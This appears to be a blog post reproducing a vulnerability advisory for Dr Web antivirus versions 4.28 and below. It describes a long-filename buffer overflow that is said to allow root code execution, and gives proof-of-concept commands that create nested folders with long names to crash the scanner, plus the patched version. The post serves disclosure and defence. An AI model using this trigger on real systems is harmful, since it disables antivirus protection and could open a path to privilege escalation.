Vulnerable versions:
* Dr Web Version 4.28 and below
Immune versions:
*Dr Web Version 4.29b and above
When a user with access to the system creates files with a very long name
it causes the buffer overflow and writes over the EIP, thus granting the
user the ability to execute arbitrary code with root privileges.
The program consists of a monitor and scanner. Only the scanner option was
tested on the 4.28a version and it was found vulnerable.
Exploit:
Build a folder with a very long name:
set a= AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAA
set b= BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB
BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB BBBBBBBBBBBBBB
mkdir /$a
mkdir /$a/$b
Or:
SET A = AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAA
SET B = BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB
BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB BBBBBBBBBB
mkdir \\?\c:\%A%
mkdir \\?\c:\%B%
Depending on system.
When the Anti-virus tries to scan the folder it crashes.
Solution:
Download latest version from Dr Web:
Newest Versions
Friday, July 11, 2008
Buffer overflow in cmd
Subscribe to:
Post Comments (Atom)
No comments:
Post a Comment